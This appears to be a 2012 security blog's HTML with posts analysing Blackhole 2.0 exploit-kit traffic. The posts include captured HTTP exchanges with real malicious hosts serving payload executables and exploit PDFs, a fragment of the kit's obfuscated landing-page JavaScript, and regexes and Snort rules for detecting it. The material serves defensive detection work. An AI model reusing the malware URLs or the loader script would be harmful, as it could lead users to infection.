<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjtM-QySwfgjaGM7AAQEr1SCDyUu_ofIBnFxrv2BKL-4MlRYnaxz_3lrKKlcKa2aDho1L4ozSHYaMZMMlBSj3PU5wv43HHsVBXowOQfSt-dOxafXxTwD1pc2ybiFMJZAVFCRJYkfxIHbKQ/s1600/blackhole-dep-enabled.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="170" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjtM-QySwfgjaGM7AAQEr1SCDyUu_ofIBnFxrv2BKL-4MlRYnaxz_3lrKKlcKa2aDho1L4ozSHYaMZMMlBSj3PU5wv43HHsVBXowOQfSt-dOxafXxTwD1pc2ybiFMJZAVFCRJYkfxIHbKQ/s320/blackhole-dep-enabled.png" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><i>Screen Cap 3:<br />Look at the task manager. Java and AcroRd32.exe.<br />The AcroRd32.exe is processor intensive when it opens.<br />Nothing shows on the screen to indicate it Adobe launched.</i></td></tr>
</tbody></table>
</div>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjkzjXyQEDxQhJRtbY_dYOxaEY_l1P52BEWjKJa-gHDI2O6xMSu1S7D2ewEP352EhrV2zVBhcPvTnyj400vQjxAAbmEVgDOjuW9JGBBpkt3delwsUSo0aMRi_gBEj4jAH3RL8zzZviiu6A/s1600/backhole-error.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="170" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjkzjXyQEDxQhJRtbY_dYOxaEY_l1P52BEWjKJa-gHDI2O6xMSu1S7D2ewEP352EhrV2zVBhcPvTnyj400vQjxAAbmEVgDOjuW9JGBBpkt3delwsUSo0aMRi_gBEj4jAH3RL8zzZviiu6A/s320/backhole-error.png" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><i>Screen Cap 4<br />Adobe and Foxit Readers security settings do not stop this attack. <br />In my lab, disabling Java does not affect it, neither does restricting PDF access to the internet.</i></td></tr>
</tbody></table>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<h3>
<span style="font-family: Arial, Helvetica, sans-serif; font-size: large;">Characteristics of the Blackhole 2.0 Binary Get Request:</span></h3>
<span style="font-family: Arial, Helvetica, sans-serif;">First off, check out this article posted by Rise on malwarereports.blogspot.com</span><br />
<div>
<a href="http://malwarereports.blogspot.com/2012/10/bhek-20-encode-param-value-update.html">http://malwarereports.blogspot.com/2012/10/bhek-20-encode-param-value-update.html</a></div>
<div>
Rise decodes the parameter values in the jar file to understand how blackhole passes the URL.</div>
<pre class="dualColTextStyle" hasbox="2"><span style="font-family: Arial, Helvetica, sans-serif; font-size: large;">
</span></pre>
<pre class="dualColTextStyle" hasbox="2"><span style="font-family: Arial, Helvetica, sans-serif; font-size: large;">The Get Request:</span></pre>
<pre class="dualColTextStyle" hasbox="2"><ul>
<li><span style="font-family: Arial, Helvetica, sans-serif;">The Regex for the URL string is \.php\?\w\w\=[a-f0-9]{10}\&\w\w\=[a-f0-9]{20}\&\w\=[0-9]{2}\&\w\w\=\w\&\w\w\=\w$</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;">The get requests are all performed by the user agent "Java", in these cases it was update 29. </span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;">The get requests contains no referrer, (but the PDFs do)</span></li>
</ul>
<div>
<span style="font-family: Arial, Helvetica, sans-serif; font-size: large;">The Response:</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">
</span></div>
</pre>
</div>
<div>
<ul>
<li>Server: nginx -<i> Be wary this could easily be changed.</i></li>
<li>Content-Type: application/x-msdownload</li>
<li>Cache-Control: must-revalidate, post-check=0, pre-check=0 - (<i>I would not rely on this one)</i></li>
<li>Content-Disposition: attachment; filename=" </li>
<ul>
<li>The file names were one of three possibilities I observed:</li>
<ul>
<li>readme.exe</li>
<li>info.exe</li>
<li>about.exe</li>
</ul>
</ul>
<li>Content-Transfer-Encoding: binary </li>
</ul>
</div>
<div>
<br /></div>
<div>
<br /></div>
<br />
<span style="font-family: Arial, Helvetica, sans-serif;"><b>URLs (Binary get request only)</b></span><br />
<br />
<pre class="dualColTextStyle" hasbox="2"></pre>
<pre class="dualColTextStyle" hasbox="2"></pre>
<pre class="dualColTextStyle" hasbox="2">/forum/links/column.php?tf=0735020b0b&ve=3307093738070736060b&f=02&nu=j&rw=m
/links/observe_resources-film.php?gf=050934030b&fe=0a050304380b37370a36&c=02&pr=n&od=v
/links/keyboard_aid_feeds.php?mf=050934030b&ue=0506050a0b0934070b06&h=02&jx=b&tj=k
/links/around_film.php?rf=050934030b&le=08040534050337333736&x=02&qb=o&zt=h
/forum/links/column.php?ff=050934030b&we=3307093738070736060b&q=02&jn=p&ep=g
/detects/signOn_go.php?ef=050934030b&me=0b350707040802093705&k=02&hz=k&kb=d
/links/calls_already_stopping.php?qf=050934030b&ue=0b36340b353507360208&p=02&kp=c&lr=p</pre>
<pre class="dualColTextStyle" hasbox="2"></pre>
<pre class="dualColTextStyle" hasbox="2"></pre>
<pre class="dualColTextStyle" hasbox="2"><b><span style="font-family: Arial, Helvetica, sans-serif; font-size: large;">Examples:</span></b></pre>
<blockquote>
GET /forum/links/column.php?tf=0735020b0b&ve=3307093738070736060b&f=02&nu=j&rw=m<br />
HTTP/1.1<br />
User-Agent: Java/1.6.0_29<br />
Host: sonatanamore.ru:8080<br />
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2<br />
Connection: keep-alive</blockquote>
<br />
<blockquote>
HTTP/1.1 200 OK<br />
Server: nginx/1.0.10<br />
Date: Sun, 07 Oct 2012 05:09:02 GMT<br />
Content-Type: application/x-msdownload<br />
Connection: keep-alive<br />
X-Powered-By: PHP/5.3.17-1~dotdeb.0<br />
Pragma: public<br />
Expires: Sun, 07 Oct 2012 12:42:41 GMT<br />
Cache-Control: must-revalidate, post-check=0, pre-check=0<br />
Cache-Control: private<br />
Content-Disposition: attachment; filename="readme.exe"<br />
Content-Transfer-Encoding: binary<br />
Content-Length: 92160</blockquote>
<b><span style="font-family: Arial, Helvetica, sans-serif;">Next example</span></b><br />
<br />
<blockquote>
GET /links/observe_resources-film.php?gf=050934030b&fe=0a050304380b37370a36&c=02&<br />
pr=n&od=v HTTP/1.1<br />
User-Agent: Java/1.6.0_29<br />
Host: corandomotorider.com<br />
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2<br />
Connection: keep-alive </blockquote>
<br />
<blockquote>
HTTP/1.1 200 OK<br />
Server: nginx/0.8.54<br />
Date: Sat, 20 Oct 2012 23:17:50 GMT<br />
Content-Type: application/x-msdownload<br />
Connection: keep-alive<br />
Content-Length: 444494<br />
X-Powered-By: PHP/5.3.14-1~dotdeb.0<br />
Pragma: public<br />
Expires: Sat, 20 Oct 2012 23:17:50 GMT<br />
Cache-Control: must-revalidate, post-check=0, pre-check=0<br />
Cache-Control: private<br />
Content-Disposition: attachment; filename="readme.exe" </blockquote>
<blockquote>
Content-Transfer-Encoding: binary </blockquote>
<b><span style="font-family: Arial, Helvetica, sans-serif;">Next example</span></b><br />
<br />
<blockquote class="tr_bq">
GET /links/keyboard_aid_feeds.php?mf=050934030b&ue=0506050a0b0934070b06&h=02&jx=b<br />
&tj=k HTTP/1.1<br />
User-Agent: Java/1.6.0_29<br />
Host: postpozic.8x.biz<br />
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2<br />
Connection: keep-alive </blockquote>
<br />
<blockquote class="tr_bq">
HTTP/1.1 200 OK<br />
Server: nginx/1.2.4<br />
Date: Sat, 20 Oct 2012 23:24:20 GMT<br />
Content-Type: application/x-msdownload<br />
Content-Length: 368640<br />
Connection: keep-alive<br />
Pragma: public<br />
Expires: Sat, 20 Oct 2012 23:23:24 GMT<br />
Cache-Control: must-revalidate, post-check=0, pre-check=0<br />
Cache-Control: private<br />
Content-Disposition: attachment; filename="about.exe"<br />
Content-Transfer-Encoding: binary</blockquote>
<br />
<pre class="dualColTextStyle" hasbox="2"></pre>
<pre class="dualColTextStyle" hasbox="2"><b><span style="font-family: Arial, Helvetica, sans-serif;">Next example</span></b></pre>
<pre class="dualColTextStyle" hasbox="2"></pre>
<blockquote class="tr_bq">
GET /links/around_film.php?rf=050934030b&le=08040534050337333736&x=02&qb=o&zt=h H<br />
TTP/1.1<br />
User-Agent: Java/1.6.0_29<br />
Host: 94.23.43.55<br />
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2<br />
Connection: keep-alive</blockquote>
<br />
<blockquote class="tr_bq">
HTTP/1.1 200 OK<br />
Server: nginx<br />
Date: Sun, 21 Oct 2012 00:31:48 GMT<br />
Content-Type: application/x-msdownload<br />
Content-Length: 73326<br />
Connection: keep-alive<br />
X-Powered-By: PHP/5.3.10-1ubuntu3.2<br />
Pragma: public<br />
Expires: Sun, 21 Oct 2012 00:31:48 GMT<br />
Cache-Control: must-revalidate, post-check=0, pre-check=0<br />
Cache-Control: private<br />
Content-Disposition: attachment; filename="readme.exe"<br />
Content-Transfer-Encoding: binary</blockquote>
<pre class="dualColTextStyle" hasbox="2"></pre>
<pre class="dualColTextStyle" hasbox="2"><b><span style="font-family: Arial, Helvetica, sans-serif;">Next example</span></b></pre>
<blockquote class="tr_bq">
GET /forum/links/column.php?ff=050934030b&we=3307093738070736060b&q=02&jn=p&ep=g<br />
HTTP/1.1<br />
User-Agent: Java/1.6.0_29<br />
Host: secondhand4u.ru:8080<br />
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2<br />
Connection: keep-alive</blockquote>
<br />
<blockquote class="tr_bq">
HTTP/1.1 200 OK<br />
Server: nginx/1.0.10<br />
Date: Sun, 21 Oct 2012 00:54:11 GMT<br />
Content-Type: application/x-msdownload<br />
Connection: keep-alive<br />
X-Powered-By: PHP/5.3.17-1~dotdeb.0<br />
Pragma: public<br />
Expires: Sun, 21 Oct 2012 00:52:37 GMT<br />
Cache-Control: must-revalidate, post-check=0, pre-check=0<br />
Cache-Control: private<br />
Content-Disposition: attachment; filename="readme.exe"<br />
Content-Transfer-Encoding: binary<br />
Content-Length: 87040</blockquote>
<h3>
<span style="font-family: Arial, Helvetica, sans-serif;">Conclusion</span></h3>
<pre class="dualColTextStyle" hasbox="2"><span style="font-family: Arial, Helvetica, sans-serif;">In conclusion, I hope that you can use this information to combat this exploit kit. As always, I welcome suggestions, feedback and teamwork. </span></pre>
<pre class="dualColTextStyle" hasbox="2"><span style="font-family: Arial, Helvetica, sans-serif;">
</span></pre>
<pre class="dualColTextStyle" hasbox="2"><span style="font-family: Arial, Helvetica, sans-serif;">Possible snort rules (I'm still testing these).</span></pre>
<pre class="dualColTextStyle" hasbox="2"><span style="font-family: Arial, Helvetica, sans-serif;">
</span></pre>
<pre class="dualColTextStyle" hasbox="2"></pre>
<pre class="dualColTextStyle" hasbox="2">alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"Blackhole 2.0 Binary Get Request"; content:"GET"; offset:0; content:"User-Agent: Java/1.6"; content:!"Referer"; pcre:"/\.php\?\w\w\=[a-f0-9]{10}\&\w\w\=[a-f0-9]{20}\&\w\=[0-9]{2}\&\w\w\=\w\&\w\w\=\w$/U"; classtype:successful-user; sid:98800058;)</pre>
<pre class="dualColTextStyle" hasbox="2"></pre>
<pre class="dualColTextStyle" hasbox="2"></pre>
<pre class="dualColTextStyle" hasbox="2"></pre>
<pre class="dualColTextStyle" hasbox="2"></pre>
<pre class="dualColTextStyle" hasbox="2">alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any (msg:"Blackhole 2.0 binary download"; content:"HTTP/1"; content:"Content-Type: application/x-msdownload"; content:"Content-Disposition: attachment|3b| filename="; distance:0; content:"Content-Transfer-Encoding: binary"; distance:0; nocase; pcre:"/filename\=\"(readme.exe|info.exe|about.exe)/smi"; classtype:successful-user; sid:98800059;)</pre>
<pre class="dualColTextStyle" hasbox="2"></pre>
<pre class="dualColTextStyle" hasbox="2"></pre>
<pre class="dualColTextStyle" hasbox="2"></pre>
<pre class="dualColTextStyle" hasbox="2"><span style="font-family: Arial, Helvetica, sans-serif; font-size: large;">Shout out to @malwaremustdie and the #malwaremustdie team.</span></pre>
<pre class="dualColTextStyle" hasbox="2"></pre>
<br />Fort Knox Networkshttp://www.blogger.com/profile/12394479781465013402noreply@blogger.com0tag:blogger.com,1999:blog-407866255126559296.post-24230593241907932302012-10-14T14:37:00.003-07:002012-10-15T10:05:54.505-07:00Blackhhole Exploit Kit v 2.0 URL Pattern AnalysisWritten by: Frank Angiolelli, CISSP<br />
<br />
<b>UPDATE: 10/15/2012</b><br />
<b>Due to the high number of FPs from facebook, the regex is now tighter.</b><br />
<br />
In my continuation of URL patterns in exploit kits, it appears the one I am focused on right now is Blackhole Exploit Kit 2.0 and its URL structure follows a predictable pattern. <a href="http://fortknoxnetworks.blogspot.com/2012/10/url-patterns-emerging-in-new-threats.html" target="_blank">The pattern I identified in this post</a> appears to be BHEK 2.0. This is a running series where I am posting my intel as I go.<br />
<br />
<br />
<b>\.php\?\w{2,10}\=[0-9a-f]{10}\&\w{2,10}\=[a-z0-9]{2,6}\&[a-z]{2,8}\=[a-z]{2,10}\&[a-z]{2,8}\=[a-z]{2,8}$</b><br />
<b><br /></b>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiohJ3vNNxypXl17Hxs-LzErq8xM1VSpbm2qYgXyTGGsv0BzvIDJ_F05xv8GSnvl5ra26sh1u6z0h060-wvbnj5CICMotOQ4Q6zJleM3Su_PNDaV9H8xlh2WjeLvbvlAGD1odLp1iKDmnE/s1600/regex.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="114" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiohJ3vNNxypXl17Hxs-LzErq8xM1VSpbm2qYgXyTGGsv0BzvIDJ_F05xv8GSnvl5ra26sh1u6z0h060-wvbnj5CICMotOQ4Q6zJleM3Su_PNDaV9H8xlh2WjeLvbvlAGD1odLp1iKDmnE/s320/regex.PNG" width="320" /></a></div>
<b><br /></b>
<br />
While some of the patterns I have investigated contain greater than 10 hex in the first parameter (in 10 character increments), the majority of these have exactly 10. If you have observations that this is hitting false positives, please leave a comment below.<br />
<br />
Some of the interesting patterns that I have discovered here are:<br />
<br />
<ol>
<li>The initial point of contact contains an applet archive</li>
<li>The initial get request response has the following at offset 0 "<html><head><title></title></head><body><div dqa="asd">"</li>
<li>The response contains try,catch,try,catch, but towards the end.</li>
<li>The second and subsequent URLs (GET Requests) are a consistent match to the regex pattern above</li>
<li>In all cases I have observed, the exploit sent was a PDF with 5 letters in the name (random name).</li>
<li>The PDFs are served with "Content-Disposition: inline; filename="</li>
<li>"/Index[5 1 7 1 9 4 23 4 50 " is a good layer 7 IOC in the response packets for the PDF exploit.</li>
<li>I have observed two different sized PDFs, not sure of differences at this time.</li>
</ol>
<br />
<b>Request:</b><br />
<br />
GET /links/rules_familiar-occurred.php HTTP/1.1<br />
Accept: */*<br />
Accept-Language: en-us<br />
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)<br />
Accept-Encoding: gzip, deflate<br />
Host: 173.246.101.197<br />
Connection: Keep-Alive<br />
<br />
<b>Response:</b><br />
<br />
HTTP/1.1 200 OK<br />
Server: nginx/0.7.67<br />
Date: Sun, 14 Oct 2012 19:52:42 GMT<br />
Content-Type: text/html<br />
Transfer-Encoding: chunked<br />
Connection: keep-alive<br />
X-Powered-By: PHP/5.3.14-1~dotdeb.0<br />
<br />
509<br />
<br />
<html><head><title></title></head><body><div dqa="asd"></div><applet archive="http://173.246.101.197/links/rules_familiar-occurred.php?cjqj=0735020b0b&zwjw=4447&pdfvomu=jpjhbwls&snguplp=nvqz" code="vwqfqwfea"><param name="&#00117;&#105;&#100;" value=' < REALLY LONG VALUE><br />
<br />
</u><script><br />
<br />
if(020==0x10)d=document;<br />
try{fsdsb^32}catch(gdsgsd){try{(d+"523")()}catch(dsgdsg){a=d[g](ggg);}}<br />
s="";<br />
for(i=0;;i++){<br />
.window.asd2();<br />
.if(r){s=s+r;}else break;<br />
}<br />
a=s;<br />
s="";<br />
k="";<br />
asd3();<br />
qa=0x1d;<br />
for(i=0;i<a.length;i+=2){<br />
.s+=ss(p(a[sss](i,2),qa));<br />
<br />
<br />
if(021==0x11)asd();<br />
<br />
..</script></body></html><br />
<br />
0<br />
<br />
<br />
<b>Request:</b><br />
<br />
GET /links/rules_familiar-occurred.php?bklx=0735020b0b&wgaxj=43&qrfjyn=33090b0b0304080b0336&chxyb=02000200020002 HTTP/1.1<br />
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*<br />
Referer: http://173.246.101.197/links/rules_familiar-occurred.php<br />
Accept-Language: en-us<br />
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)<br />
Accept-Encoding: gzip, deflate<br />
Host: 173.246.101.197<br />
Connection: Keep-Alive<br />
<br />
<br />
HTTP/1.1 200 OK<br />
Server: nginx/0.7.67<br />
Date: Sun, 14 Oct 2012 19:52:47 GMT<br />
Content-Type: application/pdf<br />
Connection: keep-alive<br />
Content-Length: 13388<br />
X-Powered-By: PHP/5.3.14-1~dotdeb.0<br />
Accept-Ranges: bytes<br />
Content-Disposition: inline; filename=2a34b.pdf<br />
<br />
<br />
<br />
%PDF-1.6<br />
%....<br />
<br />
52 0 obj<</Length 4321/Root 1 0 R/Info 3 0 R/Filter/FlateDecode/W[1 2 1]/Index[5 1 7 1 9 4 23 4 50 3]>>stream<br />
<br />
x.bbb0b`b```.G0.....!...w.310Z...2....w...<br />
<br />
<br />
<b><br /></b>
<b>References:</b><br />
<a href="http://jsunpack.jeek.org/dec/go?report=77b050856d601de7dd7df086d4cf2c03d5043464">http://jsunpack.jeek.org/dec/go?report=77b050856d601de7dd7df086d4cf2c03d5043464</a><br />
<a href="http://securityanalyst.co/blackhole-2-0-exploit-kit-pcap-download-wireshark-tcpdump-traffic-analysis/">http://securityanalyst.co/blackhole-2-0-exploit-kit-pcap-download-wireshark-tcpdump-traffic-analysis/</a><br />
<a href="http://fortknoxnetworks.blogspot.com/2012/10/url-patterns-emerging-in-new-threats.html">http://fortknoxnetworks.blogspot.com/2012/10/url-patterns-emerging-in-new-threats.html</a><br />
<a href="http://jsunpack.jeek.org/dec/go?report=43231d144a88024f6a4bdb6a890c7d51148cfae2">http://jsunpack.jeek.org/dec/go?report=43231d144a88024f6a4bdb6a890c7d51148cfae2</a><br />
<a href="http://labs.vericon.li/2012/10/exploitjsblacole-gb-infection-explained-with-source-code/">http://labs.vericon.li/2012/10/exploitjsblacole-gb-infection-explained-with-source-code/</a><br />
<a href="http://jsunpack.jeek.org/?report=bcf3b47db058c9a6406ca55e1758d0c01790683b">http://jsunpack.jeek.org/?report=bcf3b47db058c9a6406ca55e1758d0c01790683b</a><br />
<a href="http://pastebin.com/iCfC5kzY">http://pastebin.com/iCfC5kzY</a> (Credit to @MALWAREMUSTDIE)<br />
<a href="http://jsunpack.jeek.org/dec/go?report=8ec366564ae09ff7488554fffc03ad518fb5c591">http://jsunpack.jeek.org/dec/go?report=8ec366564ae09ff7488554fffc03ad518fb5c591</a><br />
<br />
<br />Fort Knox Networkshttp://www.blogger.com/profile/12394479781465013402noreply@blogger.com0tag:blogger.com,1999:blog-407866255126559296.post-79522728013850379612012-10-07T11:56:00.000-07:002012-10-07T14:48:17.663-07:00URL Patterns Emerging in New Threats.<span style="font-size: x-small;">Written by Frank Angiolelli, CISSP</span><br />
<br />
I continue my analysis of exploits URL and disk artifacts. This website was reported as a blackhole exploit., but some aspects of the network traffic are consistent with Neosploit, including the user agent strings involved.<br />
<br />
In this case, I grabbed the following exploit URL.<br />
<span style="font-family: Courier New, Courier, monospace;">hxxp://www.i-democracy.ru/letter.htm</span><br />
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhjOczo4qwcG85JteJNu7R_Qkt1SzCLVvZ7znw3LVXhxjpM2lKLDbU8hyphenhyphenUxSUrwJlBtLFLDTN1kXK_aB0NKXOcVIVUNohQzPF2_aNeqM2egj7lxrHAwMGs6f9JW81EM4m2sPwWxQuU5MXI/s1600/wepawet.PNG" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"><img border="0" height="244" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhjOczo4qwcG85JteJNu7R_Qkt1SzCLVvZ7znw3LVXhxjpM2lKLDbU8hyphenhyphenUxSUrwJlBtLFLDTN1kXK_aB0NKXOcVIVUNohQzPF2_aNeqM2egj7lxrHAwMGs6f9JW81EM4m2sPwWxQuU5MXI/s640/wepawet.PNG" width="640" /></a></div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgv4zhB13NUaKY-L02_K87og1saBBub6acV96h-oVr0hfDeFEZlGo_NwW64SM67goCT_fBnFzqqpRHOLqcDSCAHOlOuVCDfPf-q6TiyaxIC0X8_3QopFnqzcm1NHAWJ17rOtGw7SlAWmC0/s1600/jsunpack-idemocracy.PNG" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"><img border="0" height="156" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgv4zhB13NUaKY-L02_K87og1saBBub6acV96h-oVr0hfDeFEZlGo_NwW64SM67goCT_fBnFzqqpRHOLqcDSCAHOlOuVCDfPf-q6TiyaxIC0X8_3QopFnqzcm1NHAWJ17rOtGw7SlAWmC0/s640/jsunpack-idemocracy.PNG" width="640" /></a></div>
<span style="font-family: inherit;">Once my sandbox got hit, I started to notice some patterns from all these attacks, remembering back to the <a href="http://fortknoxnetworks.blogspot.com/2012/09/new-fake-av-strain-url-callbacks.html" target="_blank">FakeAV infection I looked at September 15th.</a> Deeper inspection shows what looks like a usable pattern. </span><br />
<span style="font-family: inherit;"><br /></span>
<span style="font-family: inherit;">First, in my infection the dialect of the exploit kit was very similar in pattern to the infection method of the FakeAV and matched other traffic observed. </span><br />
<span style="font-family: inherit;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi6Rje7OplQS7TIgJg3X9TBt-z8kSs2SW3SBOz-hcBsHjKQklo-EvtT2FC4mKSq0jQggKgfLtD1qPbwjjijt8xG7nu-Keo2w6lPKz6A_vHY3FyTNE9BM9zlgraQUd6kTEShmRUnAPvwz-M/s1600/screencap.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="113" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi6Rje7OplQS7TIgJg3X9TBt-z8kSs2SW3SBOz-hcBsHjKQklo-EvtT2FC4mKSq0jQggKgfLtD1qPbwjjijt8xG7nu-Keo2w6lPKz6A_vHY3FyTNE9BM9zlgraQUd6kTEShmRUnAPvwz-M/s200/screencap.PNG" width="200" /></a></div>
<br />
<br />
<pre class="dualColTextStyle" hasbox="2"><span style="font-family: Courier New, Courier, monospace;"><b>GET /forum/links/column.php?boaz=0735020b0b&zpjqh=3f38&yztospu=evicnt&utkfuo=ijdxvx</b> </span></pre>
<pre class="dualColTextStyle" hasbox="2"><span style="font-family: Courier New, Courier, monospace;">HTTP/1.1
accept-encoding: pack200-gzip, gzip
<b>content-type: application/x-java-archive</b>
<b>User-Agent: <a href="http://user-agent-string.info/?Fuas=Mozilla%2F4.0+(Windows+XP+5.1)+Java%2F1.6.0_29&test=7823&action=analyze" target="_blank">Mozilla/4.0 (Windows XP 5.1) Java/1.6.0_29</a></b>
Host: sonatanamore.ru:8080
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: keep-alive</span></pre>
<pre class="dualColTextStyle" hasbox="2"></pre>
<pre class="dualColTextStyle" hasbox="2"><span style="font-family: Courier New, Courier, monospace;"><b>GET /forum/links/column.php?boaz=0735020b0b&zpjqh=3f38&yztospu=evicnt&utkfuo=ijdxvx HTTP/1.1</b>
accept-encoding: pack200-gzip,gzip
<b>User-Agent: Mozilla/4.0 (Windows XP 5.1) Java/1.6.0_29</b>
Host: sonatanamore.ru:8080
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: keep-alive
</span></pre>
<pre class="dualColTextStyle" hasbox="2"><span style="font-family: Courier New, Courier, monospace;"><b>GET /forum/links/column.php?tf=0735020b0b&ve=3307093738070736060b&f=02&nu=j&rw=m</b>
HTTP/1.1
<b>User-Agent: Java/1.6.0_29</b>
Host: sonatanamore.ru:8080
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: keep-alive</span></pre>
<br />
<br />
Notice the differentiation in the User Agent, the initial Content-Type which is missing the subsequent requests. The initial user agent string is consistent with observed Neosploit and the binary download is consistent with java exploits where the user agent string is straight Java.<br />
<br />
<h4>
Exploit Send PDF Despite Other Exploits Avialable</h4>
What was also of interest is that this sandbox has multiple exploits available, but unlike the blackhole I analyzed on September 9th (where Media Player was exploited), this exploit kit sent a PDF file.<br />
<br />
Next, I noticed the inline attachment pdf served by nginx server. Also, see this <a href="http://urlquery.net/report.php?id=197377" target="_blank">URLquery report</a><br />
<br />
<br />
<br />
<span style="font-family: Courier New, Courier, monospace;"><b>GET /forum/links/column.php?zbyg=0735020b0b&dcgdi=4b&ayj=3307093738070736060b&okn=02000200020</b>002 HTTP/1.1</span><br />
<span style="font-family: Courier New, Courier, monospace;">Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*</span><br />
<span style="font-family: Courier New, Courier, monospace;">Referer: http://sonatanamore.ru:8080/forum/links/column.php</span><br />
<span style="font-family: Courier New, Courier, monospace;">Accept-Language: en-us</span><br />
<span style="font-family: Courier New, Courier, monospace;">User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)</span><br />
<span style="font-family: Courier New, Courier, monospace;">Accept-Encoding: gzip, deflate</span><br />
<span style="font-family: Courier New, Courier, monospace;">Host: sonatanamore.ru:8080</span><br />
<span style="font-family: Courier New, Courier, monospace;">Connection: Keep-Alive</span><br />
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;">HTTP/1.1 200 OK</span><br />
<span style="font-family: Courier New, Courier, monospace;"><b>Server: nginx/1.0.10</b></span><br />
<span style="font-family: Courier New, Courier, monospace;">Date: Sun, 07 Oct 2012 05:08:50 GMT</span><br />
<span style="font-family: Courier New, Courier, monospace;"><b>Content-Type: application/pdf</b></span><br />
<span style="font-family: Courier New, Courier, monospace;">Connection: keep-alive</span><br />
<span style="font-family: Courier New, Courier, monospace;">X-Powered-By: PHP/5.3.17-1~dotdeb.0</span><br />
<span style="font-family: Courier New, Courier, monospace;">Accept-Ranges: bytes</span><br />
<span style="font-family: Courier New, Courier, monospace;">Content-Length: 13581</span><br />
<span style="font-family: Courier New, Courier, monospace;"><b>Content-Disposition: inline; filename=a17ee.pdf</b></span><br />
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;">%PDF-1.6</span><br />
<span style="font-family: Courier New, Courier, monospace;">%....</span><br />
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;">52 0 obj<</Length 12345/Root 1 0 R/Info 3 0 R/Filter/FlateDecode/W[1 2 1]/Index[5 1 7 1 9 4 23 4 50 3]>>stream</span><br />
<br />
<span style="font-family: inherit;">Immediately followed by the binary download, made by Java Version 29.</span><br />
<span style="font-family: inherit;"><br /></span>
<br />
<span style="font-family: Courier New, Courier, monospace;"><b>GET /forum/links/column.php?tf=0735020b0b&ve=3307093738070736060b&f=02&nu=j&rw=m</b> HTTP/1.1</span><br />
<span style="font-family: Courier New, Courier, monospace;"><b>User-Agent: Java/1.6.0_29</b></span><br />
<span style="font-family: Courier New, Courier, monospace;">Host: sonatanamore.ru:8080</span><br />
<span style="font-family: Courier New, Courier, monospace;">Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2</span><br />
<span style="font-family: Courier New, Courier, monospace;">Connection: keep-alive</span><br />
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;">HTTP/1.1 200 OK</span><br />
<span style="font-family: Courier New, Courier, monospace;"><b>Server: nginx/1.0.10</b></span><br />
<span style="font-family: Courier New, Courier, monospace;">Date: Sun, 07 Oct 2012 05:09:02 GMT</span><br />
<span style="font-family: Courier New, Courier, monospace;"><b>Content-Type: application/x-msdownload</b></span><br />
